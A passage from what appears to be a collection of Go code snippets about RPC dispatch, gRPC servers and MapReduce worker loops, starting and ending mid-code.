{\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(float64); ok { \n\t\t\t\t\tmsg.Ch.(chan GetDifficultyRes) <-GetDifficultyRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getgenerate\"].Call:\n\t\t\t\tif res, e = nrh[\"getgenerate\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetHeadersCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(bool); ok { \n\t\t\t\t\tmsg.Ch.(chan GetGenerateRes) <-GetGenerateRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"gethashespersec\"].Call:\n\t\t\t\tif res, e = nrh[\"gethashespersec\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(float64); ok { \n\t\t\t\t\tmsg.Ch.(chan GetHashesPerSecRes) <-GetHashesPerSecRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getheaders\"].Call:\n\t\t\t\tif res, e = nrh[\"getheaders\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetHeadersCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetHeadersRes) <-GetHeadersRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getinfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getinfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.InfoChainResult0); ok { \n\t\t\t\t\tmsg.Ch.(chan GetInfoRes) <-GetInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getmempoolinfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getmempoolinfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetMempoolInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetMempoolInfoRes) <-GetMempoolInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getmininginfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getmininginfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetMiningInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetMiningInfoRes) <-GetMiningInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getnettotals\"].Call:\n\t\t\t\tif res, e = nrh[\"getnettotals\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetNetTotalsResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetNetTotalsRes) <-GetNetTotalsRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getnetworkhashps\"].Call:\n\t\t\t\tif res, e = nrh[\"getnetworkhashps\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetNetworkHashPSCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]btcjson.GetPeerInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetNetworkHashPSRes) <-GetNetworkHashPSRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getpeerinfo\"].Call:\n\t\t\t\tif res, e = nrh[\"getpeerinfo\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]btcjson.GetPeerInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan GetPeerInfoRes) <-GetPeerInfoRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getrawmempool\"].Call:\n\t\t\t\tif res, e = nrh[\"getrawmempool\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetRawMempoolCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetRawMempoolRes) <-GetRawMempoolRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"getrawtransaction\"].Call:\n\t\t\t\tif res, e = nrh[\"getrawtransaction\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetRawTransactionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetRawTransactionRes) <-GetRawTransactionRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"gettxout\"].Call:\n\t\t\t\tif res, e = nrh[\"gettxout\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.GetTxOutCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan GetTxOutRes) <-GetTxOutRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"help\"].Call:\n\t\t\t\tif res, e = nrh[\"help\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.HelpCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan HelpRes) <-HelpRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"node\"].Call:\n\t\t\t\tif res, e = nrh[\"node\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.NodeCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan NodeRes) <-NodeRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"ping\"].Call:\n\t\t\t\tif res, e = nrh[\"ping\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan PingRes) <-PingRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"resetchain\"].Call:\n\t\t\t\tif res, e = nrh[\"resetchain\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan ResetChainRes) <-ResetChainRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"restart\"].Call:\n\t\t\t\tif res, e = nrh[\"restart\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan RestartRes) <-RestartRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"searchrawtransactions\"].Call:\n\t\t\t\tif res, e = nrh[\"searchrawtransactions\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.SearchRawTransactionsCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.([]btcjson.SearchRawTransactionsResult); ok { \n\t\t\t\t\tmsg.Ch.(chan SearchRawTransactionsRes) <-SearchRawTransactionsRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"sendrawtransaction\"].Call:\n\t\t\t\tif res, e = nrh[\"sendrawtransaction\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.SendRawTransactionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan SendRawTransactionRes) <-SendRawTransactionRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"setgenerate\"].Call:\n\t\t\t\tif res, e = nrh[\"setgenerate\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.SetGenerateCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan SetGenerateRes) <-SetGenerateRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"stop\"].Call:\n\t\t\t\tif res, e = nrh[\"stop\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(None); ok { \n\t\t\t\t\tmsg.Ch.(chan StopRes) <-StopRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"submitblock\"].Call:\n\t\t\t\tif res, e = nrh[\"submitblock\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.SubmitBlockCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(string); ok { \n\t\t\t\t\tmsg.Ch.(chan SubmitBlockRes) <-SubmitBlockRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"uptime\"].Call:\n\t\t\t\tif res, e = nrh[\"uptime\"].\n\t\t\t\t\tFn(server, msg.Params.(*None), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.GetMempoolInfoResult); ok { \n\t\t\t\t\tmsg.Ch.(chan UptimeRes) <-UptimeRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"validateaddress\"].Call:\n\t\t\t\tif res, e = nrh[\"validateaddress\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.ValidateAddressCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(btcjson.ValidateAddressChainResult); ok { \n\t\t\t\t\tmsg.Ch.(chan ValidateAddressRes) <-ValidateAddressRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"verifychain\"].Call:\n\t\t\t\tif res, e = nrh[\"verifychain\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.VerifyChainCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(bool); ok { \n\t\t\t\t\tmsg.Ch.(chan VerifyChainRes) <-VerifyChainRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"verifymessage\"].Call:\n\t\t\t\tif res, e = nrh[\"verifymessage\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.VerifyMessageCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(bool); ok { \n\t\t\t\t\tmsg.Ch.(chan VerifyMessageRes) <-VerifyMessageRes{&r, e} } \n\t\t\tcase msg := <-nrh[\"version\"].Call:\n\t\t\t\tif res, e = nrh[\"version\"].\n\t\t\t\t\tFn(server, msg.Params.(*btcjson.VersionCmd), nil); E.Chk(e) {\n\t\t\t\t}\n\t\t\t\tif r, ok := res.(map[string]btcjson.VersionResult); ok { \n\t\t\t\t\tmsg.Ch.(chan VersionRes) <-VersionRes{&r, e} } \n\t\t\tcase <-quit.Wait():\n\t\t\t\tD.Ln(\"stopping wallet cAPI\")\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}()\n}", "func main() {\n\n\t// The command line arguments. args[1] is the supervisor address,\n\t// args[2] is the port to run on\n\targs := os.Args\n\n\t// If the right number of arguments weren't passed, ask for them.\n\tif len(args) != 3 {\n\t\tfmt.Println(\"Please pass the hostname of the supervisor and the outgoing port.\" +\n\t\t\t\"eg. http://stu.cs.jmu.edu:4001 4031\")\n\t\tos.Exit(1)\n\t}\n\n\tresp, err := http.Post(args[1]+\"/register\", \"text/plain\", strings.NewReader(args[2]))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tbuf := new(bytes.Buffer)\n\tbuf.ReadFrom(resp.Body)\n\n\t// This gives what the supervisor thinks the worker is, which is useful for debugging.\n\t_ = data.JsonToWorker(buf.Bytes())\n\n\t// If there is a request for /newjob,\n\t// the new_job routine will handle it.\n\thttp.HandleFunc(\"/newjob\", new_job)\n\n\t// Listen on a port.\n\tlog.Fatal(http.ListenAndServe(\":\"+args[2], nil))\n}", "func (p *Engine) Worker() {\n\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\tfor {\n\t\targs := RPCArgs{}\n\t\treply := RPCReply{}\n\t\tcall(\"Master.GetTask\", &args, &reply)\n\t\tswitch reply.TaskInfo.TaskType {\n\t\tcase Map:\n\t\t\tdoMap(&reply.TaskInfo, mapf)\n\t\tcase Reduce:\n\t\t\tdoReduce(&reply.TaskInfo, reducef)\n\t\tcase Wait:\n\t\t\tfmt.Println(\"Waiting task\")\n\t\t\ttime.Sleep(time.Second)\n\t\t\tcontinue\n\t\tcase Done:\n\t\t\tfmt.Println(\"All task done\")\n\t\t\treturn\n\t\t}\n\t\targs.TaskInfo = reply.TaskInfo\n\t\tcall(\"Master.TaskDone\", &args, &reply)\n\t}\n}", "func main() {\n\n\t// The command line arguments. args[1] is the supervisor address,\n\t// args[2] is the port to run on\n\targs := os.Args\n\n\t// If the right number of arguments weren't passed, ask for them.\n\tif len(args) != 3 {\n\t\tfmt.Println(\"Please pass the hostname of the supervisor and the outgoing port.\" +\n\t\t\t\"eg. http://stu.cs.jmu.edu:4001 4031\")\n\t\tos.Exit(1)\n\t}\n\n\tresp, err := http.Post(args[1]+\"/register\", \"text/plain\", strings.NewReader(args[2]))\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tbuf := new(bytes.Buffer)\n\tbuf.ReadFrom(resp.Body)\n\n\t// This gives what the supervisor thinks the worker is, which is useful for debugging.\n\t_ = data.JsonToWorker(buf.Bytes())\n\n\t// Make a directory for this worker, to avoid IO errors from workers writing and reading to\n\t// the same file.\n\tworkerDirectory = args[2]\n\tif _, err = os.Stat(workerDirectory); os.IsNotExist(err) {\n\t\terr = os.Mkdir(args[2], 0777)\n\t\tcheck(err)\n\t}\n\n\t// If there is a request for /newjob,\n\t// the new_job routine will handle it.\n\thttp.HandleFunc(\"/newjob\", new_job)\n\n\t// Listen on a port.\n\tlog.Fatal(http.ListenAndServe(\":\"+args[2], nil))\n}", "func (m *Master) WorkerHandler(args *Args, reply *Reply) error {\n\twg := sync.WaitGroup{}\n\twg.Add(1)\n\tgo func() {\n\t\tif args.ReqType == AskForTask {\n\t\t\tm.assignTask(reply)\n\t\t} else {\n\t\t\tm.finishTask(args)\n\t\t}\n\t\twg.Done()\n\t}()\n\twg.Wait()\n\treturn nil\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t\tports = Ports{ usedPorts: make(map[int]bool) }\n\t\t\n\n\t\tjob := new(Job)\n\t\tjob.MapFunc = mapf\n\t\tjob.RedFunc = reducef\n\t\tjob.JobType = Mapper\n\n\n\t\tspawnChannel := make(chan int)\n\t\tsomechan := make(chan bool)\n\t\tgo StartRPCClient(spawnChannel, somechan, job)\n\n\t\ttime.Sleep(10*time.Millisecond)\n\t\tgo SpawnReducers(somechan, job)\n\t\tSpawnMappers(spawnChannel, job)\n}", "func Worker(mapf func(string, string) []Pair, reducef func(string, []string) string) {\n\tclient := MakeRpcClient()\n\tdefer client.Close()\n\tfor {\n\t\t// 对端的 server 如果退出了,下面这个会有什么反应\n\t\ttask := Task{TaskKind: ReduceTaskFlag, TaskId: \"10\"}\n\n\t\t// fmt.Println(\"request task\")\n\t\tstatus := client.Call(\"Coordinator.RequestTask\", struct{}{}, &task)\n\t\t// fmt.Println(\"Get response\", task)\n\t\tif status == false {\n\t\t\tbreak\n\t\t}\n\n\t\tswitch task.TaskKind {\n\t\tcase MapTaskFlag:\n\t\t\t// fmt.Println(\"get map task \", task.TaskId)\n\t\t\tintermediate := mapf(task.File, readFileToString(task.File))\n\t\t\t// fmt.Println(\"map task done\")\n\t\t\tsort.Sort(ByKey(intermediate))\n\t\t\tr := MapResult{TaskId: task.TaskId, Items: divideIntoItems(intermediate)}\n\t\t\tclient.Call(\"Coordinator.UploadMapResult\", r, nil)\n\t\t\t// fmt.Println(\"map result upload\")\n\n\t\tcase ReduceTaskFlag:\n\t\t\tLog(\"get reduce task \", task.TaskId)\n\t\t\tfilename := fmt.Sprint(\"mr-out-\", task.TaskId)\n\t\t\tf, _ := os.Create(filename)\n\t\t\tdefer f.Close()\n\t\t\targFile, _ := os.Open(task.File)\n\t\t\treader := bufio.NewReader(argFile)\n\n\t\t\tfor {\n\t\t\t\tend, k, vs := readFrom(reader)\n\t\t\t\tif end {\n\t\t\t\t\tbreak\n\t\t\t\t}\n\t\t\t\tLog(\"reduce func call\", k)\n\t\t\t\t// fmt.Println(\"key: \", k, \"values: \", vs)\n\n\t\t\t\tv := reducef(k, vs)\n\t\t\t\tfmt.Fprintf(f, \"%v %v\\n\", k, v)\n\t\t\t}\n\t\t\tLog(\"reduce task \", task.TaskId, \"done\")\n\n\t\t\tresult := ReduceResult{TaskId: task.TaskId, Filename: filename}\n\t\t\tclient.Call(\"Coordinator.UploadReduceResult\", result, nil)\n\t\t\tLog(\"reduce task\", task.TaskId, \"result upload\")\n\n\t\tcase ShutdownFlag:\n\t\t\tfallthrough\n\t\tdefault:\n\t\t\treturn\n\t\t}\n\t}\n}", "func main() {\n\t// =====increment.pb.goのやつ======== ​\n\t//listen, err := net.Listen(\"tcp\", \"localhost:5555\")\n\t//if err != nil {\n\t//\tlog.Fatalln(err)\n\t//}\n\t//\n\t//server := grpc.NewServer()\n\t//service := &incrementService{}\n\t//\n\t//pb.RegisterIncrementServiceServer(server, service)\n\t//server.Serve(listen)\n\n\t// =====search.pb.goのやつ========\n\tlisten, err := net.Listen(\"tcp\", \"localhost:5555\")\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tserver := grpc.NewServer()\n\tservice := &searchService{}\n\t// Register reflection service on gRPC server.\n\treflection.Register(server)\n\tpb.RegisterSearchServiceServer(server, service)\n\t_ = server.Serve(listen)\n}", "func call(rpcname string, args interface{}, reply interface{}) {\n\t// c, err := rpc.DialHTTP(\"tcp\", \"127.0.0.1\"+\":1234\")\n\tsockname := masterSock()\n\tc, err := rpc.DialHTTP(\"unix\", sockname)\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\n\terr = c.Call(rpcname, args, reply)\n\tif err != nil {\n\t\tlog.Fatal(\"rpc.Client.Call:\", err)\n\t}\n}", "func (b *Backend) RPC(choice uint64, body []byte, v interface{}) error {\n\tconn, err := b.Dial()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tdefer conn.Close()\n\n\tchoiceBuf := make([]byte, binary.MaxVarintLen64)\n\tbinary.PutUvarint(choiceBuf, choice)\n\t_, err = conn.conn.Write(choiceBuf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tbodyLenBuf := make([]byte, binary.MaxVarintLen64)\n\tbinary.PutUvarint(bodyLenBuf, uint64(len(body)))\n\n\t_, err = conn.conn.Write(bodyLenBuf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t_, err = conn.conn.Write(body)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\trespLenBuf := make([]byte, binary.MaxVarintLen64)\n\t_, err = conn.conn.Read(respLenBuf)\n\tif err != nil {\n\t\treturn err\n\t}\n\trespLen, _ := binary.Uvarint(respLenBuf)\n\trespBuf := make([]byte, respLen)\n\t_, err = conn.conn.Read(respBuf)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\terr = json.Unmarshal(respBuf, v)\n\n\treturn err\n}", "func (w *worker) Invoke(args interface{}) error { return ErrNotImplement }", "func (wk *Worker) startRPCServer() {\n\t// TODO: implement me\n\t// Hint: Refer to how the driver's startRPCServer is implemented.\n\t// TODO TODO TODO\n\t//\n\n\t//\n\t// Once shutdown is closed, should the following statement be\n\t// called, meaning the worker RPC server is existing.\n\tserverless.Debug(\"Worker: %v RPC server exist\\n\", wk.address)\n}", "func rpc_Go(method string, args Triplet, resp *Response, ip string, port int, cs chan *rpc.Call) interface{} {\n\ttempClient, err := jsonrpc.Dial(serverInfo1.Protocol, ip+\":\"+strconv.Itoa(port))\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\t(*resp).client = tempClient\n\ttempClient.Go(\"DICT3.\"+method, args, resp, cs)\n\treturn nil\n}", "func RunRPC() error {\n\n\t// Get flags\n\ttraceserviceaccountfile := viper.GetString(\"traceserviceaccountfile\")\n\tif traceserviceaccountfile == \"\" {\n\t\treturn errors.New(\"You must supply a valid service account for tracing using the `traceserviceaccountfile` flag\")\n\t}\n\n\tprojectid := viper.GetString(\"projectid\")\n\tif projectid == \"\" {\n\t\treturn errors.New(\"You must provide a valid project id using the `projectid` argument\")\n\t}\n\n\t// Create a stackdriver exporter for traces.\n\tstackExporter, err := stackdriver.NewExporter(stackdriver.Options{\n\t\tProjectID: projectid,\n\t\tTraceClientOptions: []option.ClientOption{\n\t\t\toption.WithCredentialsFile(traceserviceaccountfile),\n\t\t},\n\t})\n\tif err != nil {\n\t\twerr := errors.Wrap(err, \"stackdriver.NewExporter\")\n\t\tphdlog.Info(logMessage,\n\t\t\t\"\",\n\t\t\tzap.String(\"processStatus\", \"unable to create stackdriver exporter\"),\n\t\t\tzap.String(\"error\", werr.Error()))\n\t\treturn werr\n\t}\n\t// Register the stackdriver exporter.\n\ttrace.RegisterExporter(stackExporter)\n\n\trpcPort := \":\" + viper.GetString(\"rpc-port\")\n\tif rpcPort == \":\" {\n\t\treturn errors.New(\"You must supply a valid port using the 'rpc-port' argument\")\n\t}\n\tlis, err := net.Listen(\"tcp\", rpcPort)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to initialize TCP listen: %v\")\n\t}\n\n\tdefer func() {\n\t\tif ferr := lis.Close(); err != nil {\n\t\t\tphdlog.Error(logMessage, \"\", zap.String(\"error\", ferr.Error()))\n\t\t}\n\t}()\n\n\trpcServer := grpc.NewServer(\n\t\tgrpc.StatsHandler(&ocgrpc.ServerHandler{\n\t\t\tStartOptions: trace.StartOptions{\n\t\t\t\tSampler: trace.AlwaysSample(),\n\t\t\t},\n\t\t}),\n\t\tgrpc.UnaryInterceptor(\n\t\t\tgrpc_middleware.ChainUnaryServer(\n\t\t\t\tgrpcmw.ConversationIDMiddleware(),\n\t\t\t\tgrpcmw.LoggerMiddleware(),\n\t\t\t),\n\t\t),\n\t)\n\tvar service *handlers.RestServiceServer\n\tservice, err = handlers.NewRest()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tpb.RegisterRestServiceServer(rpcServer, service)\n\n\tphdlog.Info(logMessage, \"\", zap.String(\"RPC Listening on\", lis.Addr().String()))\n\treturn rpcServer.Serve(lis)\n}", "func RPC_Service() {\n\tapi := new(API)\n\terr := rpc.Register(api)\n\tif err != nil {\n\t\tlog.Fatal(\"error registering API\", err)\n\t}\n\trpc.HandleHTTP()\n\n\tlistener, err := net.Listen(\"tcp\", \"127.0.0.1:8080\")\n\n\tif err != nil {\n\t\tlog.Fatal(\"Listener error\", err)\n\t}\n\tlog.Printf(\"serving rpc on port %d\", 8080)\n\thttp.Serve(listener, nil)\n\n\tif err != nil {\n\t\tlog.Fatal(\"error serving: \", err)\n\t}\n}", "func Worker(mapf func(string, string) []KeyValue,\n\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\tworkID := RegisterWorker()\n\n\tfor {\n\t\ttask := RequestTask(workID)\n\t\tif !task.Alive {\n\t\t\tfmt.Printf(\"Worker get task is not alive, %d\\n\", workID)\n\t\t\treturn\n\t\t}\n\t\tDoTask(task, workID, mapf, reducef)\n\t}\n\n\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n}", "func (r *rpcServerService) doCall(serviceMethod string, args []byte) ([]byte,\n error) {\n\n glog.V(3).Infof(\"rpc: doCall to %s\", serviceMethod)\n glog.V(4).Infof(\"rpc: doCall to %s with %v\", serviceMethod, args)\n\n dot := strings.LastIndex(serviceMethod, \".\")\n if dot < 0 {\n err := fmt.Errorf(\"rpc: service/method ill-formed: \" + serviceMethod)\n glog.Error(err)\n return nil, err\n }\n serviceName := serviceMethod[:dot]\n methodName := serviceMethod[dot+1:]\n // Look up the request.\n serviceInf, ok := r.serviceMap.Get(serviceName)\n if !ok || serviceInf == nil {\n err := errors.New(\"rpc: can't find service \" + serviceName)\n glog.Error(err)\n return nil, err\n }\n service, okType := serviceInf.(*rpcServiceMap)\n if !okType || service == nil {\n err := errors.New(\"rpc: unexpected type error for service \" + serviceName)\n glog.Error(err)\n return nil, err\n }\n mtype := service.method[methodName]\n if mtype == nil {\n err := errors.New(\"rpc: can't find method \" + serviceMethod)\n glog.Error(err)\n return nil, err\n }\n argv := reflect.New(mtype.argType)\n errJSON := json.Unmarshal(args, argv.Interface())\n if errJSON != nil {\n glog.Error(\"error in unmarshal: \", errJSON)\n return nil, errJSON\n }\n glog.V(4).Infof(\"rpc: json unmarshalled request is: %s -> %#v\", args, argv)\n replyv := reflect.New(mtype.replyType.Elem())\n\n glog.V(3).Infof(\"rpc: calling service %v method %v with %v\",\n service, mtype, argv)\n\n errCall := service.callService(mtype, argv.Elem(), replyv)\n if errCall != nil {\n glog.V(3).Infof(\"rpc call returned error: \", errCall)\n return nil, errCall\n }\n reply, errRep := json.Marshal(replyv.Interface())\n if errRep != nil {\n glog.Error(\"rpc reply marshall error: \", errRep)\n return nil, errRep\n }\n glog.V(3).Info(\"rpc reply: \", string(reply))\n return reply, nil\n}", "func Worker(mapf func(string, string) []KeyValue,\n\t\t\treducef func(string, []string) string) {\n\n\t// Your worker implementation here.\n\n\t// TODO: maybe use a channel for in-process comm?\n\t// determine task state to know which master RPC to call\n\t//reply := CallRegisterIdle()\n\tvar reply *RegisterIdleReply\n\n\t//for workerInfo.State == IDLE || workerInfo.State == COMPLETED {\n\tfor {\n\n\t\tif workerInfo.State == IDLE {\n\t\t\treply = CallRegisterIdle()\n\t\t\tif reply == nil {\n\t\t\t\tworker_logger.Error(\"Got Error!!!!!!\")\n\t\t\t}\n\t\t} else if workerInfo.State == COMPLETED {\n\t\t\treply = CallCompletedTask() // override reply\n\t\t\t//if reply != nil {\n\t\t\t//\tresetWorkerInfo()\n\t\t\t//\tworkerInfo.State = IDLE\n\t\t\t//}\n\t\t\tif reply == nil {\n\t\t\t\tworker_logger.Error(\"Got errror!!!!!!!!\")\n\t\t\t}\n\t\t} else {\n\t\t\tworker_logger.Error(\"Shouldn't be in IN_PROGRESS state here...\")\n\t\t}\n\n\t\t// TODO: maybe don't need a mutex?\n\t\tif reply.MasterCommand == ASSIGN_TASK {\n\n\t\t\tworkerInfo.State = IN_PROGRESS\n\t\t\tworkerInfo.Id = reply.WorkerId\n\t\t\tworkerInfo.TaskType = reply.TaskType\n\t\t\tworkerInfo.TaskId = reply.TaskId\n\t\t\tworkerInfo.InputFileLoc = reply.InputFileLoc\n\t\t\tworkerInfo.NReduce = reply.NReduce\n\t\t\t//workerInfo.Progress = 0.0\n\n\t\t\t// TODO: replace this with broadcaster/observer design\n\t\t\tprogress_ch := make(chan float32)\n\t\t\tdone := make(chan struct{})\n\t\t\theartbeatStoped := make(chan struct {})\n\n\n\t\t\t// Actual computing job goroutine\n\t\t\tgo func() {\n\t\t\t\tif workerInfo.TaskType == MAP {\n\t\t\t\t\tdoMapTask(&workerInfo, mapf, progress_ch)\n\t\t\t\t} else if workerInfo.TaskType == REDUCE {\n\t\t\t\t\tdoReduceTask(&workerInfo, reducef, progress_ch)\n\t\t\t\t}/* else { // None task\n\t\t\t\t\tclose(progress_ch)\n\t\t\t\t}*/\n\n\t\t\t}()\n\n\t\t\t// Heartbeat gorountine\n\t\t\tgo func() {\n\t\t\t\tfor {\n\t\t\t\t\tselect {\n\t\t\t\t\t\tcase <-done:\n\t\t\t\t\t\t\tworker_logger.Debug(\"heartbeat job received done signal, stopping!\")\n\t\t\t\t\t\t\theartbeatStoped <- struct{}{}\n\t\t\t\t\t\t\tclose(heartbeatStoped)\n\t\t\t\t\t\t\treturn\n\t\t\t\t\t\tdefault:\n\t\t\t\t\t\t\tCallSendHeartbeat()\n\t\t\t\t\t\t\ttime.Sleep(1*time.Second)\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t}()\n\n\n\t\t\tfor progress := range progress_ch {\n\t\t\t\tworker_logger.Debug(fmt.Sprintf(\"Task(%s) progress: %f\", workerInfo.TaskId, progress))\n\t\t\t}\n\t\t\tdone <- struct{}{}\n\t\t\tclose(done)\n\t\t\t<- heartbeatStoped\n\n\t\t\t// Set result location & worker state\n\t\t\tworkerInfo.State = COMPLETED\n\n\t\t} else if reply.MasterCommand == STAND_BY {\n\t\t\tworker_logger.Debug(fmt.Sprintf(\"Got masterCommand: %s\", reply.MasterCommand))\n\t\t\ttime.Sleep(500*time.Millisecond)\n\t\t} else if reply.MasterCommand == PLEASE_EXIT {\n\t\t\tworker_logger.Info(fmt.Sprintf(\"Got masterCommand: %s\", reply.MasterCommand))\n\t\t\treturn\n\t\t}\n\n\t}\n\n\n\t// uncomment to send the Example RPC to the master.\n\t// CallExample()\n\n}", "func main() {\n\n\t// Prepare some dependencies:\n\tlogger := logrus.New()\n\tstorer := new(storageMocks.FakeStorer)\n\n\t// Program the storer mock to respond with _something_:\n\tstorer.CreateCruftReturns(\"12345\", nil)\n\tstorer.ReadCruftReturns(nil, storage.ErrNotFound)\n\n\t// Inject the dependencies into a new Handler:\n\thandler := serviceHandler.New(logger, storer)\n\n\t// Make a new GRPC Server (usually I would have this in a common / shared library, and pre-load it with middleware built from our logger / instrumenter / tracer interfaces):\n\tgrpcServer := grpc.NewServer()\n\n\t// Register our Handler and GRPC Server with our generated service-proto code:\n\tserviceProto.RegisterExampleServer(grpcServer, handler)\n\n\t// Listen for connections:\n\tlistener, err := net.Listen(\"tcp\", listenAddress)\n\tif err != nil {\n\t\tlogger.Fatalf(\"Unable to start GRPC server on TCP address %s\", 